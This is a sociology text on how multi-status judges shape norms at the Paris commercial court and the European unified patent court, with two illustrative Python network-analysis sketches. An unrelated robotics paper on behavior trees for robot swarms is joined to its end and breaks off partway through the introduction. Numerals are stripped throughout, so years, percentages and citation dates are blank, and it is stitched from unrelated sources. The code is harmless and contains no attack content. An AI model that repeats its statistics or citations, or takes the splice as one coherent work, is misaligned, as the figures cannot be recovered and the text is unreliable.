the notion that different, heterogeneous dimensions of status could be socially inconsistent has a long history in sociology (hughes, ; lenski, ): a "coexistence of a number of parallel vertical hierarchies which are usually imperfectly correlated with each other. (…) certain units may be consistently high or consistently low, while others may combine high standing with respect to certain status variables with low status with respect to other variables" (lenski, : ). it helps with substantiating the complex link between political work and position within the structure because political actors, as institutional entrepreneurs, try to both accumulate power and increase their legitimacy. indeed, in the political process, it is not enough to simply assert that the strongest impose their own rules. rather, neo-structural analyses show that it is often improbable agents occupying heterogeneous and inconsistent dimensions of social status, i.e. in a position of 'conflict of interest', who have the greatest influence in the political work of institutional transformation, of defining selznick's 'precarious values' as priority rules.
examples of how relational infrastructures, particularly complex and inconsistent forms of status, matter in the institutionalization of norms in micro- or macro-political controversies (lazega, : chapter ) abound. analyses based on this approach show, for example, how financial industries play a specific role of 'discreet regulators' (huault & richard, ). the study of regulation networks shared between public bodies and private agents shows how proactive, and how capable of guiding regulatory work, the latter are. the financial sector is not the only powerful agent in terms of institutional work, but its traditionally dual (economic and political) character gives it a specific role in many regulatory processes. this is precisely because of its capacity to benefit from status heterogeneity, high-status inconsistencies and conflicts of interest. this allows it to become – in part – its own regulator, and to dominate and capture, for example, judicial institutions.

structure, culture and broken promises: combining high-status inconsistency with rhetorics of sacrifice

why are members with several, heterogeneous, high and inconsistent forms of status – multi-status oligarchs – particularly efficient as institutional entrepreneurs when operating in collegial oligarchies and using conflicts of interests? neo-structural sociology has long contributed to research in this area (compared, for example, with owen-smith & powell, ; glückler, suddaby & lenz, forthcoming), not only by framing institutionalization in these terms but by explaining the efficiency of high-status inconsistency. this efficiency relies on the agents' ability to lose status on one dimension and use a rhetoric of sacrifice to 'manage the losers' of the institutionalization process (lazega, ) – i.e. to manage actors who stand to lose out from changes in the rules. these multi-status oligarchs are not just boundary spanners: they are improbable linchpins with a high probability of being either sidelined or punching above their weight. they have to choose, for example, between broadening their constituency (with a view to the long-term stability of the institution) and establishing oligarchic closure.

indeed, since actors organize their collective action around projects and rules, changing the rules is equivalent to breaking promises made to these actors. using a position of high-status inconsistency is efficient in terms of institution building when actors are able to combine a form of power (control of resources that others need, i.e. finance, expertise, technique, time, law, etc.) with a form of legitimacy (a discourse on behalf of the collective about the value of the new norms that is considered credible and compatible with its overall project). this credibility is increased when the change of rules is presented as a cause of loss of status for the institutional entrepreneurs themselves. this loss of status is often presented as a personal 'sacrifice' of status for the common good. but this loss is very relative, if not false, when this 'sacrifice' jeopardizes one dimension of status without jeopardizing the other, high and uncorrelated, dimension of status.
combined with other factors, this justification of broken promises is thus more likely to obtain normative alignment from the losers of the process – those who had previously organized themselves around the former rules – without forcing the entrepreneurs to lose all forms of status. losing out on one dimension of status (while still keeping the other dimension) is thus equivalent to the rhetorical creation/purchase of much-needed legitimacy. electoral politics rely very often on this rhetoric of 'loss' of status that institutional entrepreneurs claim to accept for the general interest. examples of such 'sacrifices' are provided in the two illustrations below.

collegial oligarchy, weak culture and normative alignments

the strength of these actors (their weberian herrschaft) is increased when they are able to join forces in what we call a collegial oligarchy. institutional entrepreneurship is strengthened in a regulatory college bringing together several persons with high-status inconsistency and conflicts of interests. this helps to draw a wide variety of constituencies into the process. together, multi-status oligarchs become both vertical and horizontal linchpins in multiple, potentially conflicting domains and levels of regulation. together they are able to negotiate, select and stabilize not only the formulation of new norms, but also the conventions and interpretations of these priority norms (favereau and lazega, ).

the main reason for which the creation of a collegial oligarchy is efficient in bringing together structure, culture and collective agency is that a group of heterogeneous leaders, even fraught with initial disagreements, diverse constituencies, or antipathies, can evolve over time. years, often decades, of common and discreet collaboration create proximities, personalized relationships and fragile structural equilibria where mutual critique decreases over time. being in a collegial regime of personalized relationships reduces the capacity to challenge others' normative choices, to disagree. members use their personalized relationships because they facilitate discussion over time – even when these are not necessarily quiet relationships. the important feature of this collegial and oligarchic closure is that it excludes stakeholders that would not agree with the regulatory solutions and compromises hammered out as 'weak culture' (schultz and breiger, ). this notion suggests that one can draw new and different actors (foreigners) into this process with the right choice of words. oligarchic closure and cross-cutting networks have consequences for political participation: if you are not at the table, you are on the menu.

applications and developments in neo-structural economic sociology

regulation and institutionalization – approached from the perspective of the strong political influence of 'improbable' multi-status oligarchs with high-status inconsistency and rhetorical skills – are among the processes that we have studied the most in neo-structural economic sociology. it has been productive to invest in this field of research because it was characterised by an era of 'governance'.
in this era, the command and control framework of states weakened, and business was trying even harder than usual to take advantage of high-status inconsistency and conflicts of interests to build its own self-contained normative spaces where it could define the rules and the dual dimension of joint regulation of markets without politicians and citizens interfering with its institutional entrepreneurship.

to illustrate this neo-structural approach, let me present two cases of institutionalization of new norms in business-related judicial institutions (lazega, ), one french and one european, looking at how relational infrastructures and high-status inconsistencies are mobilized in these institutionalization processes. these are studies of how business takes advantage of high-status inconsistency, conflicts of interests and the dual dimension of joint regulation of markets, most often with strong but discreet help from public authorities. (footnote: we have tried to combine these elements in a cycle of conferences called réseaux et régulation that lasted years ( – ) and that was set up and organized together with lise mounier.) (footnote: this is not the place for a detailed description of the face-to-face interviews (with sociometric questions, reconstitutions of careers, open-ended questions, vignettes, etc.) of actors involved in institutional entrepreneurship (renegotiation of new norms), nor of the usual difficulties of 'studying up'.) in these studies, the main institutional entrepreneurs are judges who are not shy of exposing the political dimension of their work.

the first study looks at how the financial industry has captured a judicial institution, the commercial court of paris ( – ). the second study looks at the currently emerging european unified patent court. both raise anew selznick's ( ) old issues of how to design public institutions in a world of governance (to use today's vocabulary) where an institution becomes a different thing to different people, and where each stakeholder pushes towards goal drift.

promoting norms at the commercial court of paris ( – )

the commercial court of paris is a -year-old court specialized in commercial litigation and bankruptcy. it is the first-level judicial institution enforcing, creating and updating business norms. the french code de commerce was written by its president. heterogeneous, high and inconsistent dimensions of the social status of the judges in this court come from the fact that they are all business persons, often successful executives or entrepreneurs, and at the same time officers of justice with the highest possible probity expected from (sworn-in) civil servants/judicial judges. the institution is truly judicial, and delivers fast, cheap, pragmatic, precedent-based justice using a special 'practical' procedure. judges are not just business people, but also voluntary lay judges ( % with a law degree) who are endorsed by an industry and coopted by their peers. % are retired and % are still paid by their employers or own their own company (in ). the composition of the court is characterised by an over-representation of the financial industry ( % of all judges are bankers and insurers). the building sector, another highly litigious sector, sends in % of the judges. there are many examples of how these judges do punch above their weight.
one example is provided by the story of how they saved the french banking sector from bankruptcy in the s (lazega, mounier, lemaire, ). another example is the very resilience of this institution thanks to its built-in problem of conflicts of interests and institutional capture.

this court has a strong formal organization, with a rule that judges rotate each year around its carrousel of chambers. we have used the metaphor of the spinning top to model the combination of these organized mobilities (rotation) and the emergence of a pecking order in the dynamics of the advice networks among all these judges (lazega, lemercier, mounier, ). high-status inconsistency is obvious and conflicts of interests are institutionalized (lazega & mounier, ), as shown by the composition of the chambers in this court in , illustrated by figure . in this figure, bankers are in pink. banks are the main creditors in the economy; the very simple fact that so many bankers sit in bankruptcy chambers illustrates the level of institutional capture.

[figure : status inconsistency and conflicts of interests at the commercial court of paris: composition of chambers in ; judges-bankers in pink. panels: bankruptcy chambers; bankruptcy chamber ; chamber of appeal against decisions made by bankruptcy chambers.]

however, the domination of bankers also extends, beyond bankruptcy chambers, to epistemic domination in the other activities of this court. to show this, we measured the advice network among these judges in , and , as represented in figure . an analysis of this dataset using snijders and nowicki's ( ) stochastic blockmodelling shows that, in these networks, bankers with a law degree are consistently the most central advisors for their peers. statistical analyses (mentioned above) of the dynamics of this structure confirm how this collegial oligarchy controls the court epistemically.

[figure : how do bankers exercise epistemic control in the court and dominate as multi-status oligarchs? cyclical dynamics (centralization-decentralization-recentralization) of status in the advice networks among all judges, across three waves. red: super-central core; green: 1st semi-periphery; yellow: 2nd semi-periphery; blue: periphery. core, semi-peripheries and periphery identified with snijders & nowicki's ( ) stochastic blockmodelling. source: lazega, sapulete & mounier ( ).]

the evolution of social and epistemic status in these cyclical dynamics is indeed characterized by the capacity of this handful of members to keep their epistemic authority and maintain their highest centrality scores over time: they surf at the top of a wave of centralization, decentralization and recentralization of the system that was measured in this case. thus, and importantly from a neo-structural perspective focused on institutionalization, the multiple dimensions of status of these specific actors in this system are high, inconsistent and stable relative to the cyclical dynamics of the system. this capacity creates a competitive advantage in the struggle to define the priority norms in the court.
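the blockmodelling used in this study (snijders & nowicki) estimates latent core/periphery blocks from the observed advice ties. as a rough, self-contained illustration of the kind of partition reported above, the sketch below ranks judges by incoming advice ties and cuts the ranking into strata. it is only a degree-based proxy on an invented synthetic network, not the actual stochastic blockmodel estimator; all names, sizes and thresholds are assumptions made for illustration.

```python
import random
import networkx as nx

random.seed(1)

# toy directed advice network: an edge (i, j) means judge i seeks advice from judge j.
# the graph, its size, and the attachment bias are invented for illustration only.
judges = [f"judge_{i}" for i in range(60)]
g = nx.DiGraph()
g.add_nodes_from(judges)
for seeker in judges:
    # each judge seeks advice from a few peers, with a bias towards a small set
    # of "bankers with a law degree" (here, indices 0-4).
    advisors = random.sample(judges[:5], 2) + random.sample(judges[5:], 3)
    for advisor in advisors:
        if advisor != seeker:
            g.add_edge(seeker, advisor)

# in-degree = number of colleagues who come to you for advice:
# a crude proxy for the epistemic status estimated by blockmodelling.
indegree = dict(g.in_degree())
ranked = sorted(judges, key=indegree.get, reverse=True)

# cut the ranking into four strata, mimicking the reported
# core / 1st semi-periphery / 2nd semi-periphery / periphery partition.
quarter = len(ranked) // 4
strata = {
    "super-central core": ranked[:quarter],
    "1st semi-periphery": ranked[quarter:2 * quarter],
    "2nd semi-periphery": ranked[2 * quarter:3 * quarter],
    "periphery": ranked[3 * quarter:],
}
for name, members in strata.items():
    print(name, "-", len(members), "judges, e.g.", members[:3])
```

run over several synthetic waves, the same ranking step would let one check whether the top stratum keeps the same members while overall centralization oscillates, which is the pattern the study describes.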
bankers with a law degree not only exercise epistemic control but also use this control to promote specific norms in the court. we measured normative controversies in the court and asked each judge to read jurisprudential cases summarizing these controversies, to use their discretion in judicial decision making, and to discuss them with us in face-to-face interviews. one of the cases concerned 'predatory prices' and the assessment of punitive damages in a case of unfair competition. we found that money does talk in this institutionalization process: bankers were spreading self-serving norms of non-punitivity for such damages. snijders' siena models (lazega, mounier, snijders and tubaro, ) of the increasing super-centrality of bankers with a law degree over time helped us track the expected dynamics, exposing the fact that no pure normative homophily was driving this spread of non-punitivity. it was rather reflexive alignment of the majority of judges on the normative choices of the super-central bankers (multi-status oligarchs), who achieved normative steering of the court by building epistemic authority thanks to their super-centrality combined with predictable rhetorics of status sacrifice: 'we [banks] could benefit from the current excess of punitivity, but punitivity in principle is bad for the economy'. other judges aligned their normative choices with those of these multi-status oligarchs.

this institutionalization process is not driven by pure normative choices. it is rather driven by normative choices combined with specific relational infrastructural dynamics in two processes. firstly, by a dialectic of overload for the super-central members (who cannot answer all the requests for advice) and normative conflicts (lazega, sapulete and mounier, ). secondly, by the carrousel of chambers across which judges are rotated once a year, with many non-random infractions to the rule and a limited time horizon for all, including for the members in the core emerging from the movement. driven by rotation and induced by delegation and turnover in these advice networks, oscillation (centralization, decentralization, recentralization) produces a form of rewiring that signals to most judges whose normative choices survive in these normative controversies.

this first example confirms the capacity of the neo-structural theory to account for this institutionalization. our second example also involves judges punching above their weight in institution building.

institutionalization of new norms for the european unified patent court

this second case is about the institutionalization of common norms at the emerging european unified patent court, which is meant to build a unified intellectual property (ip) regime for all european countries. it is based on the same approach as in the previous example, this time with judges working at the international level to build this judicial institution (scheduled to come into existence in ). it starts with a familiar pattern of eu institution building, beginning with the failure of european national governments to agree on common solutions and to concentrate enough power at the european level to impose such institutions (dehousse, ; thatcher, ).
here the institutional entrepreneurs are corporate lawyers specialized in patents, representatives of a public/private regulator (the european patent office, epo) and activist european judges with high-status inconsistency (civil servants openly involved in lobbying and political work). the position of these judges can also be characterized by high-status inconsistency because they openly cross the lines of division of powers – thus aggrandizing their role in democracy. this lobbying for the creation of a transnational court to enforce a legal instrument, the european patent created in , was accompanied by work trying to create a common interpretation ('harmonization') of the european patent.

indeed, the normative controversies, both substantive and procedural, about the interpretation of this patent concern the assessment of the 'inventive step' of an invention, the determination of the scope of protection afforded by the patent, the involvement of technical experts, and the use by judges of personal rules considering patents either as exceptions to the rule of copying or as rewards for the inventor. these disagreements led to a fragmented normative space in european ip. an example concerning an anti-depressant drug called escitalopram is a good illustration. generic supplier companies have long sought the revocation of a basic patent held by a pharmaceutical company that first synthesized this molecule. a dutch court in the hague decided on complete cancellation of the product and process claims for lack of an 'inventive step'. in germany, the bundespatentgericht decision was the same. however, a decision of the french tribunal de grande instance in paris was that the product claims by the pharmaceutical company were valid. in the united kingdom, a first-instance court decided to invalidate the product claims, but for a different reason (namely insufficiency of disclosure). the case is still regularly revisited. this fragmentation facilitates forum shopping by multinational companies, and the emergence of 'zombie' patents.

prodded and assembled by the corporate lawyers and by the epo, activist european ip judges started to network and convene at the so-called venice forum, a field-configuring event, to lobby for the construction of this european court and to work together on harmonizing their interpretations by hammering out a 'european compromise'. where governments failed, a small collegial oligarchy of super-central judges emerges from these events and is poised to create the new european ip regime. this collegial oligarchy of judges is perceived by their peers as primi inter pares who should sit on the future court of appeal of the upc and make decisions that will create a common jurisprudence. three different networks of european judges were measured at the venice forum: the network of national and foreign peers (present at the venice forum) with whom judges personally discussed patent issues; the network of national and foreign peers whose decisions they read; and the network of national and foreign peers whose decisions they had actually cited at least once in their own decisions.
figures . to . identify the most central high-status inconsistency venice forum judges assembled in a 'conclave', or collegial oligarchy, that was both central in the three networks of transnational social exchanges observed among these judges at the venice forum, and in a fourth network of judges considered to be representatives of the future uniform position about patents in europe (henceforth called the 'uniform network'). (footnote: this word was used by lawyers and judges themselves. for example: 'on a personal level, cohabitation – almost in a conclave – allowed us to get to know and appreciate each other (…) patent judges from the main european intellectual property countries confronted their points of view, sometimes very frankly, but always with courtesy'.) note that the reference network (respondent i cites explicitly – in his/her own decisions – decisions made by foreign judge j) is the sparsest network because explicit reference to the work of foreign judges is forbidden in some countries (for example france), but it remains the main network in terms of influence.

[figures . – . : the venice forum collegial oligarchy: three different networks of european judges measured at the venice forum. figure . : reading network; figure . : discussion network; figure . : reference network.]

[figure . : uniform network. judges perceived by their peers as closest to a future uniform european position (the future 'european compromise', if any). *: super-central judges. source: lazega ( ).]

multi-status oligarchs, i.e. super-central uk, german and dutch judges, dominate this heterogeneous set of venice forum judges. losers are french, southern and central european judges. super-centrality in the uniform network is explained at % by centrality in the three other networks, by membership in a block of countries sharing the same kind of capitalism, and by judges' use of experts in the legal procedure (a discriminant feature separating the uk from the continent at the time). analysis of the judges' positions in the controversy, combined with their positions in the networks, shows a slightly chaotic situation: personal ties between judges across borders do not lead (automatically) to convergence and 'harmonization'. at the time ( ), judges actually disagreed on several key issues with the peers that they had selected as the future representatives of the unified european position. these super-central judges at the core of the network, the future rule makers according to their peers, also did not agree with each other (yet).

this analysis of the venice forum relational infrastructure identified the judges who later came up with the rules of procedure of the upc, a compromise based on rhetorical/possible 'sacrifices' of distinctive procedural features of each big country's national 'legal culture': orality and adversarial procedures by the uk; saisie-contrefaçon by france; and bifurcation by german judges. lazega, quintane and casenaz ( ) provide ergm analyses of the emergence of this uniform network and identify the costs for each of the venice forum judges in terms of alignment upon the kind of judge whom they have selected in this uniform network. based on future 'forced' normative alignments, winners of the institutionalization process are germany and the uk, losers are southern and central europe.
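the published analysis uses ergms; as a much simpler stand-in for the idea that position in the uniform network can be 'explained' by centrality in the reading, discussion and reference networks, the sketch below runs an ordinary least-squares fit on synthetic data. every number, coefficient and variable name is invented; it only illustrates the shape of this kind of explanatory analysis, not the published model or its results.

```python
import numpy as np

rng = np.random.default_rng(0)
n_judges = 40  # invented

# synthetic centrality scores in the three exchange networks measured at the venice forum.
reading = rng.poisson(4, n_judges)
discussion = rng.poisson(3, n_judges)
reference = rng.poisson(1, n_judges)  # the sparsest network, as noted in the text

# synthetic "uniform network" in-degree: how often a judge is named as a
# representative of the future uniform european position (plus noise).
uniform = 0.5 * reading + 0.8 * discussion + 1.5 * reference + rng.normal(0, 1, n_judges)

# ordinary least squares with an intercept: uniform ~ reading + discussion + reference.
X = np.column_stack([np.ones(n_judges), reading, discussion, reference])
coef, _, _, _ = np.linalg.lstsq(X, uniform, rcond=None)

predicted = X @ coef
r_squared = 1 - np.sum((uniform - predicted) ** 2) / np.sum((uniform - uniform.mean()) ** 2)
print("coefficients (intercept, reading, discussion, reference):", np.round(coef, 2))
print("share of variance explained:", round(r_squared, 2))
```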
here again, this case confirms the capacity of the neo-structural theory of institutional entrepreneurship outlined above to account for the construction of this institution.

conclusion

to sum up, people are not equal in their capacity to defend their regulatory interests: some punch above their weight by bringing together structure and culture to shape collective agency, process by process, particularly regulatory and institutionalization processes in political work. neo-structural institutionalism (lazega, , a, ) shows how helpful it is to identify specific relational infrastructures in socially organized settings to help model processes of regulation and institutionalisation of norms and practices. institutionalization is characterised by specific social dynamics of oligarchical negotiation of 'precarious values' (selznick, ) and stabilization in the interpretation of the rules en vigueur. in these dynamics, institutional entrepreneurs with heterogeneous and inconsistent forms of social status (measured also in network terms) can have a particular influence in promoting their regulatory interests: when defining priority rules; when using a rhetoric of relative sacrifice to build legitimacy and manage the losers; when articulating and synchronizing regulation levels as vertical linchpins. high-status inconsistency is indeed the main characteristic of relational infrastructures mobilized in the institutionalization of controversial norms. the added value of taking into account the real complexities of high-status inconsistencies was illustrated in two different cases. analogies between the two cases are not superficial: the same concepts (relational infrastructure, status heterogeneity and inconsistencies, conflicts of interests, multi-status oligarchs, collegial oligarchy, rhetorics of building legitimacy and credibility) and measurements prove useful in accounting for institutionalization.

in the neo-structural model of the regulatory process, and in politics in general, individuals do not just represent themselves. here they represent organizations, professions, their country, their type of capitalism, or even legal cultures. (footnote: legal cultures could be considered to be a level of collective agency if they are defined as dramaturgies, i.e. as involving a text, a scenario, players, roles, strategies, skills and all the ingredients of a play.) this means that the process is necessarily a multi-level one, with superimposed forms of collective agency, justifying the scientific work at the level of granularity presented here. for example, judges and countries represent different levels. within-country relations between judges as nodes differ essentially from between-country relations between judges, which is distinct from between-country relations where countries are the nodes. what is therefore needed in further exploration of this institutionalization process is a combined dynamic and multi-level perspective (snijders, , ). indeed, neo-structural institutionalism requires new and richer kinds of data structures, modelling the emergence of an institution using more powerful stochastic actor-oriented models for dynamic multi-level networks, and perhaps new measures. for example, since these dynamics are multi-level, synchronization issues between levels also emerge in institutionalization.
related to synchronization and its costs: since institutionalization is so oligarchical and driven by closed and collegial elites, how should the widening democratic deficit that comes attached to the process, and that has been criticised in the public debate over the last few years – especially in relation with the public/private dimension of such institutions – be questioned? such questions show that it is necessary, for a better understanding of the relation between structure and process, to articulate a neo-structural institutionalism (that exploits the critical potential of network analyses of dynamic multi-level systems of interdependences) with the political and cultural institutionalisms that prevail in sociology today. in that respect, much remains to be done. (footnote: synchronization refers here to the construction of intermediary-level relational infrastructures where actors combine temporalities of collective action taking place above and below their intermediary level, and try to behave in a way compatible with their own interpretations of norms coming from both upper and lower levels (lazega, c).)

references

bathelt, h. & glückler, j. ( ). institutional change in economic geography. progress in human geography, ( ), - .
christopoulos, d. & ingold, k. ( ). exceptional or just well connected? political entrepreneurs and brokers in policy making. european political science review, ( ), - .
dehousse, r. ( ). l'europe par le droit. critique internationale, , - .
dimaggio, p. ( ). interest and agency in institutional theory. in: l. zucker (ed.), institutional patterns and culture. cambridge, ma: ballinger publishing company, - .
favereau, o. & lazega, e. (eds.) ( ). conventions and structures in economic organization: markets, networks, and hierarchies. cheltenham: edward elgar publishing.
glückler, j., suddaby, r. & lenz, r. (eds.) ( ). knowledge and institutions. heidelberg: springer.
hall, p. a. & taylor, r. ( ). political science and the three new institutionalisms. political studies, , - .
hoffman, a. j. ( ). institutional evolution and change: environmentalism and the us chemical industry. academy of management journal, , - .
huault, i. & richard, ch. (eds.) ( ). finance: the discreet regulator. how financial activities shape and transform the world. london: palgrave-macmillan.
hughes, e. c. ( ). dilemmas and contradictions of status. american journal of sociology, , - .
lahille, e. ( ). le politique dans la théorie de la régulation: bilan et perspective. colloque la théorie de la régulation à l'épreuve des crises, paris, - juin , université paris-diderot-inalco.
lawrence, t. b., suddaby, r. & leca, b. ( ). institutional work: refocusing institutional studies of organization. journal of management inquiry, ( ), - .
lazega, e. ( ). the collegial phenomenon. oxford: oxford university press.
lazega, e. ( ). networks in legal organizations: on the protection of public interest in joint regulation of markets. oratie for wiarda chair, wiarda institute publications, faculty of law, utrecht university.
lazega, e. ( ). capital social, processus sociaux et capacité d'action collective. in: a. bevort and m. lallement (eds.), capital social: echanges, réciprocité, équité. paris: la découverte, - .
lazega, e. ( a). sociologie néo-structurale. in: r. keucheyan et g. bronner (eds.), introduction à la théorie sociale contemporaine. paris: presses universitaires de france.
lazega, e. ( b). time to shrink to greatness? networks and conflicts of interests in large professional firms. revue für postheroisches management, , - .
lazega, e. ( c). learning from lobbying: mapping judicial dialogue across national borders among european intellectual property judges. utrecht law review, http://www.utrechtlawreview.org, ( ) (may).
lazega, e. ( a). réseaux et régulation: pour un institutionnalisme néo-structural. revue de la régulation : capitalisme, institutions, pouvoirs, https://regulation.revues.org/ #text
lazega, e. ( b). joint 'anormative' regulation from status inconsistency: a multilevel spinning top model of specialized institutionalization. in: margaret s. archer (ed.), anormative regulation in the morphogenic society. springer, - .
lazega, e. ( c). synchronization costs in the organizational society: intermediary relational infrastructures in the dynamics of multilevel networks. in: e. lazega and t.a.b. snijders (eds.), multilevel network analysis for the social sciences. springer, - .
lazega, e., mounier, l. & lemaire, s. ( ). financial pragmatism and bankers' politics: the duality of the "zombies" debate in bankruptcy proceedings at the commercial court of paris ( - ). in: v. boussart (ed.), finance at work. london: routledge.
lazega, e. & mounier, l. ( ). networks of institutional capture. in: b. vedres & m. scotti (eds.), networks in social policy problems. cambridge: cambridge university press, - .
lazega, e., lemercier, c. & mounier, l. ( ). a spinning top model of formal structure and informal behaviour: dynamics of advice networks in a commercial court. european management review, , - .
lazega, e., sapulete, s. & mounier, l. ( ). structural stability regardless of membership turnover? the added value of blockmodelling in the analysis of network evolution. quality & quantity, , - .
lazega, e., mounier, l., snijders, t.a.b. & tubaro, p. ( ). norms, status and the dynamics of advice networks. social networks, , - .
lazega, e., quintane, e. & casenaz, s. ( ). collegial oligarchy and networks of normative alignments in transnational institution building: the case of the european unified patent court. social networks, , - .
lenski, g. e. ( ). status crystallization: a non-vertical dimension of social status. american sociological review, ( ), - .
owen-smith, j. & powell, w. w. ( ). networks and institutions. in: greenwood, r., oliver, c., sahlin-andersson, k. & suddaby, r. (eds.), the sage handbook of organizational institutionalism, - . london: sage.
perrow, ch. ( ). a society of organizations. theory and society, , - .
scott, w. r. ( ). institutions and organizations. thousand oaks: sage.
schultz, j. & breiger, r. l. ( ). the strength of weak culture. poetics, ( ), - .
selznick, p. ( ). tva and the grass roots: a study in the sociology of formal organization. berkeley: university of california press.
selznick, p. ( ). leadership in administration. evanston, ill.: row, peterson & co.
snijders, t. a. & nowicki, k. ( ). estimation and prediction for stochastic blockmodels for graphs with latent block structure. journal of classification, ( ), - .
snijders, t.a.b. ( ). the multiple flavours of multilevel issues for networks. in: lazega, e. and snijders, t.a.b. (eds.), multilevel network analysis for the social sciences. springer international publishing, - .
snijders, t.a.b. ( ). stochastic actor-oriented models for network dynamics. annual review of statistics and its application, , - .
thatcher, m. ( ). analysing regulatory reform in europe. journal of european public policy, ( ), - .

automatic modular design of robot swarms using behavior trees as a control architecture

antoine ligot*, jonas kuckling*, darko bozhinoski, and mauro birattari
iridia, université libre de bruxelles, brussels, belgium; cognitive robotics, delft university of technology, delft, netherlands
* these authors contributed equally to this work.

abstract. we investigate the possibilities, challenges, and limitations that arise from the use of behavior trees in the context of the automatic modular design of collective behaviors in swarm robotics. to do so, we introduce maple, an automatic design method that combines predefined modules—low-level behaviors and conditions—into a behavior tree that encodes the individual behavior of each robot of the swarm. we present three empirical studies based on two missions: aggregation and foraging. to explore the strengths and weaknesses of adopting behavior trees as a control architecture, we compare maple with chocolate, a previously proposed automatic design method that uses probabilistic finite state machines instead. in the first study, we assess maple's ability to produce control software that crosses the reality gap satisfactorily. in the second study, we investigate maple's performance as a function of the design budget, that is, the maximum number of simulation runs that the design process is allowed to perform. in the third study, we explore a number of possible variants of maple that differ in the constraints imposed on the structure of the behavior trees generated. the results of the three studies indicate that, in the context of swarm robotics, behavior trees might be appealing but in many settings do not produce better solutions than finite state machines.

subjects: adaptive and self-organizing systems, agents and multi-agent systems, artificial intelligence, computer aided design, robotics
keywords: swarm robotics, automatic design, behavior trees, finite state machines, evolutionary robotics, automode, optimisation-based design

introduction

in this article, we extend the original definition of automode—the family of automatic modular design methods proposed by francesca et al. ( )—to study the use of behavior trees as a control software architecture for robot swarms. in swarm robotics, a large group of autonomous robots cooperate to perform a mission that is beyond the limited capabilities of a single robot (beni, ; Şahin, ; brambilla et al., ; garattoni & birattari, ). a robot swarm is highly redundant, self-organized, and decentralized in nature. these properties are appealing in applications that, for example, imply a high risk of individual failure, take place in locations with limited communication infrastructure, or require scalability (dorigo, birattari & brambilla, ).
unfortunately, these properties also have a downside: it is difficult to conceive and implement control software for the individual robots so that a desired collective behavior is produced. as a general methodology is still missing, the design process is typically labor intensive, time consuming, error prone, and difficult to reproduce (brambilla et al., ; francesca & birattari, ; bozhinoski & birattari, ). automatic design is a valid and promising alternative (francesca & birattari, ; birattari et al., ). in automatic design, the problem of designing control software to perform a given mission is re-formulated into an optimization problem: an optimization algorithm searches a space of candidate solutions so as to maximize an objective function. in this context, a candidate solution is an instance of the control software to be executed by each robot, and the objective function is a mission-dependent score that measures the performance of the swarm on the given mission. because the evaluation of candidate solutions on physical robots is costly and time consuming, automatic design methods typically rely on simulation. (footnote: for the sake of completeness, we mention here that some automatic design methods do not rely on simulation: they operate while the robots are deployed in their operating environment. we refer the reader to francesca & birattari ( ) for a discussion of the advantages and limitations of these methods.)

a major issue with the adoption of simulation in automatic design is the so-called reality gap (brooks, ; jakobi, husbands & harvey, ): the difference between simulation and reality, which is ultimately unavoidable. as a result of the reality gap, it is possible, and even likely, that control software generated in simulation suffers from a drop in performance when deployed in reality. the reality gap is one of the most challenging issues in the automatic design of robot swarms (francesca & birattari, ).

evolutionary swarm robotics (trianni, , )—the application of evolutionary robotics (lipson, ; floreano, husbands & nolfi, ) to robot swarms—is a popular automatic design approach. in evolutionary swarm robotics, an evolutionary algorithm (bäck, fogel & michalewicz, ) generates the control software of the robots, typically in the form of an artificial neural network. the inputs of the artificial neural network are the sensor readings; the outputs are the control actions that drive the actuators. although evolutionary swarm robotics has been successfully used to generate control software for various missions (quinn et al., ; christensen & dorigo, ; hauert, zufferey & floreano, ; trianni & nolfi, ), it presents some known limitations, among which is its inability to cross the reality gap reliably (silva et al., ).

francesca et al. ( ) conjectured that the issues encountered by evolutionary robotics with the reality gap are due to the high representational power of artificial neural networks. this leads the design process to overfit characteristics of the simulator that do not have a counterpart in reality. as a result, the control software produced fails to generalize to the real world. inspired by the notion of bias–variance tradeoff (geman, bienenstock & doursat, ) from the supervised learning literature, francesca et al. ( ) developed automode: an automatic design approach in which control software is conceived by automatically assembling predefined modules (that is, low-level behaviors and conditions) into a modular software architecture.
the rationale behind automode is to lower the representational power—and therefore the variance—of the control software it produces by introducing bias: the control software is restricted to combinations of predefined modules. this restriction restrains the space of the possible instances of control software that can be generated by automode, with the intent of reducing the risk of overfitting characteristics of the simulator that are not a faithful representation of reality. automode is an abstract approach that, in order to be used, must be specialized to a specific robotic platform by defining low-level behaviors and conditions, the specific rules/constraints to combine them, and the optimization algorithm to search the space of solutions. so far, all instances of automode that have been proposed—that is, vanilla (francesca et al., ), chocolate (francesca et al., ), gianduja (hasselmann, robert & birattari, ), waffle (salman, ligot & birattari, ), coconut (spaey et al., ), icepop (kuckling, ubeda arriaza & birattari, ), and tuttifrutti (garzón ramos & birattari, )—target the e-puck robot (mondada et al., ).

to substantiate their conjecture, francesca et al. ( ) compared the performance of vanilla and chocolate with evostick, an implementation of the classical evolutionary swarm robotics approach. in their experiments, francesca et al. ( , ) observed that both vanilla and chocolate are able to generate control software that crosses the reality gap satisfactorily. in addition, they observed what can be called a rank inversion (ligot & birattari, , ): evostick outperforms vanilla and chocolate in simulation, but vanilla and chocolate outperform evostick in reality.

in the original definition, francesca et al. ( ) characterized automode as an approach to generate control software in the form of a probabilistic finite-state machine (francesca et al., , ). however, this characterization appears to be too restrictive: the element that truly characterizes automode—whose name is the contraction of automatic modular design—is that it generates control software by combining and fine-tuning predefined modules. indeed, according to the conjecture of francesca et al. ( ), its modular nature is the main reason why automode has shown to be robust to the reality gap: the architecture into which the modules are assembled appears to be a secondary issue.

in this article, we aim at investigating the possibilities, challenges, and limitations that arise from the use of behavior trees in the context of the automatic modular design of collective behaviors in swarm robotics. behavior trees are a popular control architecture originally proposed for game development (champandard, ; champandard, dawe & hernandez-cerpa, ), and offer a number of advantages over finite-state machines, such as enhanced expressiveness, inherent modularity, and two-way control transfers (colledanchise & Ögren, ). moreover, colledanchise & Ögren ( ) have shown that behavior trees generalize a number of other architectures, including the subsumption architecture (brooks, ) and decision trees (nehaniv & dautenhahn, ).
recently, behavior trees have attracted interest from the domains of artificial intelligence and robotics (colledanchise & Ögren, ). the main characteristic of behavior trees is the use of complex behavioral modules as leaf nodes that return their state of execution: running, success, or failure. behavior trees are therefore a convenient way to implicitly model plans of execution: they define what action needs to be taken if a given condition is met or not, and if a given behavior succeeds or fails.

